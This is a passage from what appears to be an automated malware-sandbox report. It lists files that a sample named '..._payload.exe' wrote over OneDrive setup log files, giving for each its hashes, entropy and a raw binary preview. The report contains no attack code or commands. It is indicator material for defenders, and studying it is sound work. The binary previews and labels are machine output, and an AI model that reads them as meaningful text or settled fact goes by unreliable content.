                                                                                                                                                                      Preview:EBFGOxb.h..`2F....r...q.....&.).@G....uG|I..&..^@]..A..h...&.^I=[..Jb6.;...V'.x..}\.0.0.O-O.m.Z..5+N..{{-........uu=.N-.......z.P...'.>.3..c...3.s........u......0....C....).h5.Nxc.......<...5l..5-....QDQ.P...5.%...N.?.a.&.&,...G......$....z....`..~..hW.0.vV...G..............J!.{.k0<.F?M.f4.[5.".I..I.>.,...`...X.........1...:.O..y....9.....F.'..w.:..#(.I.^..P0.i..my ..V.C..x.)L$]..B..o]..!.......b.x.t...AW...?..'......m..S@7..;6.t..y-my.b.#%.{....|.=.1..]f..=Y.w.k...f...,....N....l..gT.'A.";...]>.)Y.b71.......IC.o..(.7......M|f.}.....PZ.p)zo..P.@..a.A.K2;......5G..O...>PM.H...a....`.....;{<...W).}H.u_|...V...}0.....I..j,.@...-.{.X.8..R<....m....W...o..0.DGV.&..".}....^.....'.^.0......Rzm.LyU...$qBK|k...k.~....Bq.1e....`u..NX(._.....B-....s.3..Du.2mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2023-10-04_105958_19ec-19e8.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):3.8937167214259265
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:G8gERYNE9OAdoFXO9WXEibk2WCb/anRHzST+ecE1207mOPIknx09qmGDowL:Z1RnJGFeozbkxvACeT7V09qmNu
                                                                                                                                                                      MD5:6B8068B045425E6BFD0C9A59CD6C79F7
                                                                                                                                                                      SHA1:FF07CCBB13E96A6CA9B2790979DBF2CFD60EAB79
                                                                                                                                                                      SHA-256:47901D166C81B647EE89464914236DFDF0311D7764DD971E14A9C0296261424C
                                                                                                                                                                      SHA-512:8C68859F7D4A7125BEA2D08E80D197DAEBE1CB7A87A38B7EAA96D8D6046B20F7C50DD2B3D5A052D0DDF7F3506F69A74EBC48EF3C7B2A30EDA246EC95898FBAFC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./._$...]p.$..2....8..=|./c..K~....q.*p....5....Jb]":..).e.Q.`t!.=z@.L.oc...z...H=./t9....?)%+...'..Bh.9...`.Bk`.....Iw.Q.. >|.....n.D.2(..aC....B.y....E.9#.......;.,ODoT.f.>.d.&$!..1..OR..@B.J.....D...D.......Y.5..g.R.........,.Jlh.W...........d.....5<...(0p.9.Mia.$.7.i..Z.p.^:2..S.^z..y=../`.E.x.42r..W..u.b.....1C..9...]HSu....W#..B1'...K.2..bg}.F.x2.K....bL..k.*.....5..xr(ij.Z.^.]BS|Y.W....>...|e.eW.Fe..X.....<x%0.E.E/..4..:K...uN...w...x...Jo...46c..D...ha..m.c.<.........l..Am..w.M3...<...4....Y..0.+..a..$....vx4n.t.......<.F?..=..d.h+&.|...U.z.!#.$HK1.$...........'.|.z......p]@X..M.6R...g...t~...l....~.P....@.}.d....A...>_.T.=b.\...m.g.e_:.G.....3?.....>..x.."%*......'..x,.wy....jH.k.$..*EH.@{.c.. .(e..t<J...N...2..-.,..ga.h...!+.v..3..k...I................)..&...ID.4....0C...n*.$.!.-.V..}..Z.X.!...z.n.$..X*....u...x..AQ.0..2.......9d............1..W..o...Cg..0.....R...3y...}&..VZA.gaj.k..d.].G.Q._1POML..G..H..>.MQ.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2023-10-04_105950_1894-1898.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):4.413157800977746
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:YOvobllGpxI27uGbTOPNtnIOvmTTeScccSSY:B6QuyTqHI/TTlcSSY
                                                                                                                                                                      MD5:DA40B7D7F8F9F6C0F140E7EDA1841FBC
                                                                                                                                                                      SHA1:9285BB2FCAD27FB131BA5F84338025815D71A915
                                                                                                                                                                      SHA-256:B57307F05715282B622657005382F756318F3E67B0465A08805ADDB1D2A1174A
                                                                                                                                                                      SHA-512:E5D5DFFF1081789093B638992FA8830B4607A556945662EC6C0C684AE99BAEF8CB6301C578259ACB8EB4E53C3AAB15E294A0E6371647585076BB7205A02678D8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./. ._....H..K<.g9/.0i...^.!...:WS.R.o.C...+.!$..*_8o.w.2I.,.,.)....+1..E-.W.:..*...'L.....K....c...s....h ........[.f+.lJK....6."..[.L.....]...#.Cr.....H......,.T_....2.c.......bh..toJT..P..p~......yf6..2..L........x...{....,.U4.Fq.........Su.R.V....,..'......1`.\.=...R..U..T}..E.&...H...E...8`.3.U!..r.!uYz...$.9.:..O../.7...t..F.l-.+y...I*.g.V.L..........j..wz.{M;.S...c..pC.j.0N.q`.6..M``.(..;..z[A.Xe....P.\D..7F.;.8...i..>r....x.......'..'...".Lq.t.*V..N^w.lC^...a.~..R.u.).NO...W.cN..`g.Gj|.@8...v..y....t....w?"...........h.a8.t..Z..x....k.Z..t^...}........].R....V.@.qBC...*G(.a....H..W....._.y_Q.J..|F..Z=+..vD....;S.l.-..n....eh.E.9...^...5.".=.E.5..B.[.3...O....:...f=.p.."9.,$N.MLjT=O0.....c.5..m...!...6.9...U..N.P..,.J .\\U.^.1J.T..7l.<.o-C...E...&.../hMp.r.>...8$...m.>....k.....W.o..;.7.?T.T..{..W.i.H.8.@.J|c.!4...0..'.`..A.(.......G..sy...y}c *..*.I.!....d??......dUb.[bU..........6...a."U.~...q3x...."E|.A.0Q.3..U1.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_114942_500-1efc.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):4.555881176160681
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:VslQwUB9iKHvX1LFgW1mqEm6lhwRaJoLZ:VlprPPDgW1mqEmZRuo
                                                                                                                                                                      MD5:354CD425281EACB218B5FD2A5D8CC497
                                                                                                                                                                      SHA1:301F0284AE242953C2F0E2F521158EC84F757DA8
                                                                                                                                                                      SHA-256:209D308552BC0FB0A3364606457838382ACDCFD047DDE63009EE595BEC48E03E
                                                                                                                                                                      SHA-512:B2B26BF974EEE91A21DA00F404E86A4FDEB4A0C70464CC77FE62B144A536CD42BB8FE3E0CCF573957A3461F2115B83D4CE8C7BFDE2B652EF6052C26CCFF3FDD8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./.k.h.z..JWm...d.\....gi4.~PL.....w..,.#..J.~....zuI.V....d.......jD...n1v...0.,.x.....AX.....#R.E....l.]A.rP......Q..5.x.\...#6.n..XY.f8r#.L..,.d.J..!.$....:.[....1OW.=... ...R..].>}P:-P.....2..@&ukc...p.?....A.r....].[.....5.......I'^..&.9]'......F.8.2e.....p....`?.a@.l.L....{6...8.y"BCV..3....1.....<..sm.+\.=r.}...7.a...:......5.._y'..qd...c..'...U.Z....:...q.&..i8*.,..0o..,..H.}..S....4..28x.M.'`.E..;.}IQ;.~UY......?O...Z......Z..^.6.|...2..6=.rz.......A...;&....t..h..-..8\.#`..=.{......../.U.[....O...6.Hlg................^]...{..kD.)..'<.J.>....u.z..,.....0040..gE.....`.T...6...O...XWy..qy1o"..z.3q.......,"-zoG..F..jTx.&..]..ed..(u.y.&..4.Lr.t.O...h.R.m.o....7..W2.....;.$.zqrs...2.E.k...t.%|.....]G.e!.....>....g.\..N.H.../[..8.ZN..r..61H.U..|.pt.CO..j-....t#...;....+.D[..;...K./J....G..Tr-.. .Cc..r@.jI.!..e0.4.9..)Q.J.rU..".._:.F.h"...>........0.8...K/'A(k!I.1..U.4A4G...J.k%L.i.!..I..@IcA..c...nTD..=6..rV.:....A....3...7...D.=.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115011_3184-4676.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.3118472543164816
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:AO4FIW6UNyGXWwuUJyyzSPc3BzpQI8Z/:8DN5rbJ6GpQI
                                                                                                                                                                      MD5:1E90D83910D1CB4C4556C65A81A76DEB
                                                                                                                                                                      SHA1:05AD335F054DDC6BDA33A00BB9B87A75E49FBC5A
                                                                                                                                                                      SHA-256:26CC27D80A80FF744A9C006FECB0D20BF4B79A15C971938C06CB8B0E31DB94FF
                                                                                                                                                                      SHA-512:03BFC3784E38A72BF86A04A4BF0BC7FF5B666D61186AE7F0D49F6F313BCBB9BB14763E9D5C8360095F24EC47879A5826EEE091EAF178513AB7DE043F7897AD79
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./?e+....6Jt......X...\...z..l.*W......r...}.E.VW..-...)..e$p.G...w*..(....g.......k.5..s...\s.7....w.N.-8.F6...!...O..@3.<.&.e.7a.@AI...?u1..7]....o.U.pI^...>.L.?......V.u ...h/n...*.B....Q.=.[?.t$>.............c{...m[.+"j...&.tNPM.....^..3.....=A....Gi..N.f.5.c.NF\..........+.e.jJ9....Q..|.6..7.5....J......"..A..^.....v...`A.`9.a-.(.3}gO._..Wi.p..0&...............S..}...h....-Y..^..~..e.!T.X.J..]P.M[.>..o...p20T9[!...?.'..D'.Z.h.~.c.:.O.U..........@.FN......v0.....w....T..OS..q,.....Mg.._..}..F?.4l]hgfww.......0.M....v..==sls..A!.f ...rDze...!m....:U.+~X.]..@....d..X.4!...(..Y.ZF5..{.8.Qr_|H...8.x-..+.o..|g.ma!S\..A.>..,.]o...F+.......T....G.0......h..!..4..w?....7.d.br[=_t....\..zqZ..34BE[i.l4nw...~..5..<...P....\..wXRF..Fvf..O....'@.a&..5..;o"....X....->R.R....W=..vW........#......P....*...D....@4.......@)...."..b...SA.x........G(j.....,R....R(@.xMz]eu*...e..+p...g(..?.......F.Bn.A....9....i..P.....=$g.<.C.(..'...8..B....AS_..e.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115204_7008-7012.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.5731463923271901
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:vv6WDvtGKefjGqyqSbrkJr2JoYh86aY1FcAqP00JkE3RNQOEozFyBxMz:tvt8AfkJKXhzaYFcA2hGozEo
                                                                                                                                                                      MD5:172BDF307CCA14CA1A692009FCF2571A
                                                                                                                                                                      SHA1:D9D4CBA7E734382FCB78FF9C491B897E69BFB5B5
                                                                                                                                                                      SHA-256:B2B881A5D50C703648034395189C0CD47CC2E7A9FF3CACA97BE77330A42AFEC7
                                                                                                                                                                      SHA-512:55C8ECDADF01AE12A829945BF8C78F4A5AFD0AFB32C9B6C528BC5841938817537B5C3BED2EE9D282CCC3868324C4010E282B5FA429F300D1F6F3B0AA83B0C417
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./._VSY@...m........W. ..-....>....o.dYqt..t.QW...oL.`b.3....O....^......9..,/./.u(.t.1\i..j.|.$r.~g.&.....4c".c...A4LV.c..!5.L..6.6..!6H.`.`.[.^.U=..l.F.z:...."..z/.......B.\..%.1Q..yl$..e\.C.._......&..@.R=.;E_...g.....5...p.A...P%....A?v"D.<6.n.5.Q..!.&............"..{..5.%j./..y.S..~T}.7..`a<..|.tAwzm.x..%.....ILe.B...--....M.?..Y-?I.q...(.@.E./d._|ik..SN..;T\d..a.....:.^s......Z3I.g.r...Z.k.9W.aD.....@...,.;k..m.i.;..>X.0.Uf..i....P..j..0..E.B...(..>....2@.s.m.........;.....Ew.*Y:. .1..).h.....R.....i.C...?p.@..6A.>>^....jE....}I..xsX."......&g.N.G<......(A.>.<.R.t.I.....9..]..F.u.:......t[.j.......M..Y....."Q=q.....~..k...#..D.-"7.y&t...kC.tt.Q...).y.2.\._..p..+..,\..2O..l..b=........m.).k4.2F...,. ..........F...n.q....o..H.....r.g..e}d...RM_.N.kv..rT.$.....6lY1.).T.p4..%.B0.`QnO...<........H4..........X..-En>..V74nxP...Y.,.N.Ld\'.8z.K..G...:.?.H..=..<-.....7.O.G..>....+....L!Q h\...H4..n...(.....kD........,U.+K..n^...Z`.N...D.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115740_6260-6264.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.5749326942366311
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:wSvrZ8f29y/d8URvBlbVNKDtQk22ZxtParX1lbhELGUIkaQsWvaRTzTFafHPRz:5X9yF88/VaD2KtP0Dg+tHwaZRcHPp
                                                                                                                                                                      MD5:60ECDDA922C5F4E586BB47649884F642
                                                                                                                                                                      SHA1:F01C9438024E3C1969C4D81AC7637924E7AB0596
                                                                                                                                                                      SHA-256:D00F0E705B92F0EF0E7EDFAED8489B61433E7DF1B6C560F6F6F8267E7D394333
                                                                                                                                                                      SHA-512:676AD4AF6C72B440D6268CA4E188231D1E5C16C362521309D8FED217CFDD523EA5A02466AD2373F2C0AB0228BA0BC30C78E83D34487F6668F31BD476D54E8F07
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./:.#h...~./8..|.....D.@'....=.W.Tv....,.9..<..Z..... .-..$...^u...K..!..T....m.z.i.B.%.BT...+*.Y.M..=...S.W.J...P..!.1f..H.E.....D.k[m.,.}.~.J......:t...v.qy`#?Gr.....f..8....F.m.q.qa..y...c.....(.T..;^....wJs..U!6.......YYJ+.......-.(......($.Ou=..*..(......k..O3.z.x.|o...J..pF.V....{<......R...@B.B.......v...0i..Lf..V.......o...".x.:1. ......".H1...4N+....Y./.....T.1N..0@......qf.Q.{$/s.K...P.@.Z.z!c.....H....n."Q........l.p.R.;._i.."..._^1..9b.2.\.lJ8.J.3..K..g..G.tL...E.}.t&....M._,@...4.e.. .....9n.8&2..=..."...)......q...a.L.*..2`........]....T...k..:v%.O3....m..&f...l.Z...h..f.B.........?_.../.Bv.....I".<";QV.:~.I;4_._...:..M.....].M#.=d.B.6...ka.l.V.v........"..\0.E-.jf....b.D~n.;..q.j.+;n0.`.}......1k......1Y-,:Z...wZOM...C.9.=....<"'.j..+...~^..o.t...zc.......\a..0..&..-.Mrl..d.l2..L....2.9{.F{:..Y.l3..au.....L..5.A8%T.~..*..M?..6......Jw..q...k..,..f.;..:RP.......i......3..a..-.V...s|...CQ.]...`!367.......C.Q..H...v.q.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_121144_6972-6976.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):2.7264494371561834
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:W4ddvqoBvdXJ2rz2njAqfXaV5WagDys5wq0O3I:tvrVdXJ2X2njAqE55c0mI
                                                                                                                                                                      MD5:E859C885FE77BEBE7D1F5CD8EA1DFAF3
                                                                                                                                                                      SHA1:A3CC359662BEB9E9BE229A1139E7BC8A050BC374
                                                                                                                                                                      SHA-256:20C9550D8C481CA1E949D759DABC6005C0D44C1363034CC618C7D43788DAE089
                                                                                                                                                                      SHA-512:29BF469F608265FA84C8F447B1F3066E40EA14D0A86AE9AD92CBD1A0D621FE24DA7F57B9841268EE4D6288647C79AFE103638DA3FCEC470C393F97F888BD9385
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./.0..A...+...J8....4.....[F.*..j.,.[.?7."pj%-5.].F.a...Oa...Q.W|../.F..0.......k.....ma....=...v.$DwSn.u.!.AY.s~.y....dQ..!{U5[.....; r.|s.....v7...I"Q..Q6...T......g.DN..&...d.@..<...A..D.=&..!.p.".1Q#../Y.3.......>J.(B.z...Al.......qe..u..a'..s/....w...Q..............r..P.z6/]....0...m....&..M$........'.."..I..l..6.........W....!..Z.X...l.>..I...D....y...[v..0.e| .E@....k....S.{.......7..|...]!.........6.t.....J.a...d..I8p7......n.0.:.S8.a..!.tX[..P.#.Hj..*....Q.B*O.?..0X@.....r... .o^...'.X3%..DQ1.p`....(z.>..7C.CBP*`F...I...."......->-q..Y.=4a.n.@Q.*...d......9_.@b8.{.i..\.S,..l.......*.W.p.^..vA...c.../.E..k.."..59......;.4m1..; .,.WP...D.....*...d...d."F...2.........^o.\.7.....[......l.3..)...@..#..lU.s3S!.P"..o..8.N*......9..../....}l........4t.$..$.m...Lm.7..L.wl.u@...,.Nz..e.Odvh4e)=.1^.c..%.....n...ym...:.@..E.`.2).~....-2.t.qUq...O.h..a.....#s....'u.F...w...K.H.K.&q..^...JGUn:.....p..t.`x.@..+.k.G...p.q.8.(.Y.-...^....O..).

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_121212_7980-7984.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):2.6019789508315525
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:BAczJEIraDUUvhe0UD/3VaKZlSQDuPVt/q+zeGzBbo12Rma9kD89bDc5iu1OwAue:rVyUspQ/3pZlS0MteQBbosNVQZVPWx
                                                                                                                                                                      MD5:384A7CEEB00AB38BC1B0D75E9CA08D2E
                                                                                                                                                                      SHA1:83B04A2422D0438428A3FB9928DE2EBF01049DDE
                                                                                                                                                                      SHA-256:31562FA9471AAE5FE259ED4E7CAEC386AA3737021787BBD67994A4A591D07BB4
                                                                                                                                                                      SHA-512:B6A593E4A0A6A121782D20358DB11933CE1A7B1C782DC67EE3CEE1AAB4F326CEF853BE351A3C78150ACBCF54B63954C0B8CFAD624693CFF709A4807C5361964A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./>6..S.A^..i..Gu...!(..-.y:.*..0..~.Z.X..5.&...>.C.....a....H.k..*.....y.o.a.t:....E.Y..._6ME..(Fy.K.........N..u.M.0.(../f..x.%.~...1~.|....hh...>b.".f...S|8!...E~....Id.8.C.,z..>p".....p(......`j..|.b.m...Bk(...uFy.}]....V).".....M..?..fO...........yz.W.6..vX.F...,......'C".R...>..uoS5.....B.....J...J.O......F.r./8..O'....gs..~B.6..;|.......GV.T.!E/*..D.6......|.X..C^.s.#..[.K...g1au...X.]...S.B....C.~...\..`...`X.~..H:.@>...B3.......h..M.-.....]..K.....8` ...;>~.+..{...W...1 .j".f....D...x.n.....ox..5x....4y'vp...PK$..;.!...3....b@r..T....,...aE...^...$,..y.Ot3...G._.S..[J[.......q_...jC....Mwqd.@.l2V.~~.)!...u._...~.%...O..9ug..#..x.....]{.D..-y.....e"k.-\..._..J..&...sh..h&g......"tO.L., ...mdk..F..?.W..H."6^...J.9..o"y...A4.E5.Q..[..8..{m.s..A.....-...N|.}....F....;%.......$..c.on...y..i 5..nG........<#X^..!..v...P..*.$.I.!...'(.M}.R.gS...d.E\d..t....#...SX2Cf.........tz.%..J.c6x.81....ec(0..X.....]>I...@?..7*..L.Z...?.\>=.0E...4AK..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_082907_5964-5996.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):2.3783533874332816
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:XG7t21ycLs/PcW5hVyqVTQUzk9y29TSKIfK43Q8WtBmElVscNtGwqoRrWc:XG8jLs/kAhVyqtIr9gfdKBZ0o/qif
                                                                                                                                                                      MD5:54F15806230929E2502799A3C94FB449
                                                                                                                                                                      SHA1:CD5556D9FF25D53334062DB7CB663CEB3CBCAB23
                                                                                                                                                                      SHA-256:EED77BBD092B91CFA4FC881FCC6F139433EF3925C2522130F26B637D8A724CF5
                                                                                                                                                                      SHA-512:1F5CD6665893E6183D561FE85C4F509A5D9350755EFCFE82870528F6128DA11BA2D98465B1906B650B27863D1527C386478B8664AF554416AD00B14AB42CE7C8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./.O.... ..y..+e...#.-.m.....P\......V.."=3../..y6......v..JlW..=h~=..\...?...x.O.....XsZ.=.9.Q.hr.o...JP..cM.lT.M;.L......1.o..FP...G*.|;X...LK....<+...;......]*Lk..[+.@\.@.j..H.....J..k....(...P..X[u.".y.....^...t......U.Y{U......... .n...V.8..s..-H...M4MK.7X...".n.._..p....`..x.<RjF...e..IH..7.NQ.u...o...cx(K,./._.,..+4C.&...].F.$...,1..w.y5}.lZ.......6g.w.r].....;I...!..-7.\.!...opY.e..5}..*C^<.r&...@...x.O.....S..Ij:..K{..by.;..t.dd+...no...yD.=..M...%vb@o.Y...C..mE.B...s.+..{.01. ...VV...}...\..@iG.....WaP.Z.'...kh.}p..b.`........D}.%w... ..T"K..ik...w.....X....A.T......Y.{..........O.V.T..~).w. ...?....:..E...m.qd.f.X._..e...ZU.\.....,.b.Sg..)...q.....=..T....]i....*v_..,..t..".{w.g..d......#. ..#..0.y...R.:..QXdKq!`..O....$.n....W...8..|.U...\....c.wK;./....@../...S.>[Q....}.w.. .+.......V...M.Y...W.=g...~.p..'....|....T...\.pE.?.C;.M.j.2.....+x..7.j.@/H....?..g.@...gp8)..2.,n6+^sE0i[..Q...&j.<m.+.5........y..M;..H.I.._.s

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_083412_6972-6976.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.202516948206662
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:qrTWaUFx/qkExsVpJd1+3R/U0ZSTMRPx4stQAFsndWIx0o6D6rIXyi6hGJ3tQzRh:Dak/vye4wTMRJ9xCdnCtcO
                                                                                                                                                                      MD5:417120ABAFB792005D037030B178DAE0
                                                                                                                                                                      SHA1:3711763A0D19426C55D61B7470C607E3DA1BDA94
                                                                                                                                                                      SHA-256:2E554AB2231AE8BCEFB89B92C47369AFB8025F8E8B298C595916266354C5D8C2
                                                                                                                                                                      SHA-512:7C766979CCFC616F951A2D1EA7A1603CAB5468F6C70D52A8FE91AA21532A695AC82E9ED2CBD1710088F32BB386A58E71F89D10B5CF503B6C53B4D0C0E1A5BF3A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./.S.9..)...r...:.DV&T.......}v..(+.qD.s..|+....I..~...`.=....[..`.........7.J......G`.........5.s...J....(.../..v..\H......3.".(.4..,....AzK.....1...-..)9..^wc....w....Z......i.81/v..b/n.....2...P*.....E..0#n'.#.g..&.(o.G.5%W..qz....[..a.....n..Y&..c.{...M.%~ye.rk...?.pI...*.E....<.4......DJ.....Y..!..2......4.h.."...u."..av.....GJN....7......q.X7.}YhGHq..~7]T............W..G.......Wb..8.>...a!.. 8..v.....?..{u..:3.S.7=0..%....Zf...`.Z...t$......i..G...+...R...rD`.#I.=.'..@\.U..K.M...Zg._f...SyG[.|....8....%.1.gc.F.@.B....r.$.?........o.uo..t.........~,Z.......<(.4...v..j..........).n...2...B<.......g........]-..`.:..T..\.5......g.l.j[Q...[..r.(.SbD..7>..;+O.)....:s...7K..g.....e..XK.0...*Y#..v1G..]G...@wN-Ca..h.........D.`)-..r.e.QXG*..Lkcv9......H.'3.9:C.[..P.p.^.;`."..C......[j...8..5.........y.GYY...l.....Y0......<1K......w3Eq.b}.o...y._H.F........I.3......*.thVI^K.8:.6.x..t.G.$*..j.Q.#We.iL.#.sT...4.\s>.....v.A...|".9.n

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-04_083652_5268-4940.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.764531972774911
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:P085Jn75yjadXduwSTANrc9aC9yMlGl3Gx2n24q99geI62BI/brLkn:san1MadXdNSENAlAGV4V61rL
                                                                                                                                                                      MD5:57F7DA550FB1B73A200DF42CC3DFE1C8
                                                                                                                                                                      SHA1:B8F1C151B585B625BFD5173452D383BC10ADBD89
                                                                                                                                                                      SHA-256:07B7F4808557E66D5DD4D84B7D632EF0FEE9BDFFC51C656B24491860BA4D95D7
                                                                                                                                                                      SHA-512:F1561208E83C9217980ADD31E8CDA7C9349A377EF140BF692D8DF8455DA367230324D84B75FA2E32456A6DDECEBD4EA57E5C8BDA4F07F5173D0C3C5C4F26EBD5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./[5...m.....V......u.......q.H..%'.W.Z..Q..+.jhI.....6....D8.6..;.3..KQQbP2}.>yo&.....*v.Y.";2....e.. ........2.W......7i.... ...Kq...2b!.......RT1......*.H9.J...........K....g-.Z.4...:Oo.._..5@.dh.%...;.IR&@..........HM.I........;..1.....@....e...../.j.]...-N...Jh...(.J..t.....P..q.1lA..*.C.HR.I.5.-M.(......./.-...........Y.=.9..r....{..........*.z.kb.=..{.up.........w....R....Z8)R.%.b.x...g...B..S..7T...^.Ep`..2.8..MsK...q..cRy.p.Y..MLX}G.v.P....s+.J }.~....q.......{./.[I.$i..4..tt.j..3......A...kuS7..~......;..h.....(...../..c......(.>.*TT..\:t..3Rv.Oj...t.r..3K...WR.{..S0+....{<.P.P..Tr.K....s.....Q.o....(t.q>.U.~......d.!.....Ln..G.K.....$.4J....\.....3...-.wmf..._...N.......}gn..../..)...9.h.41?|..O..)R...C.6..%..5.9.}K?...6sr...865.m.?...G.......E...'.*.x....#.n1...iF..x.i.|}p...f..p...?.P|G.d/., .'\.._i....-.2Q..L:..L,.7...}...Z~.....eB.1....!..nj.Q.."...?.W.)?7W7.R.=.i...k........g...C.m..S7ctV.]...S.]..s].p.OI...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\machineTelemetryCache.otc.session

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):3.427182181305332
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:5XrX0SmCnsUHVGbinfgkV4V7N4dwcGA/CT2TmOlg1YOW51kkoRPpvWl:5IlzkVGbifgkV4FN4Kl2tlg1YOXHRBA
                                                                                                                                                                      MD5:8E1BCE2355E693482FFF923FF88A718B
                                                                                                                                                                      SHA1:F42765CC580A398AC80EDF717D1329A49AC4BC98
                                                                                                                                                                      SHA-256:C8DB0C951CFFDE731EB9BFB7AB11388EA935590010902FC80EDD2217142EED08
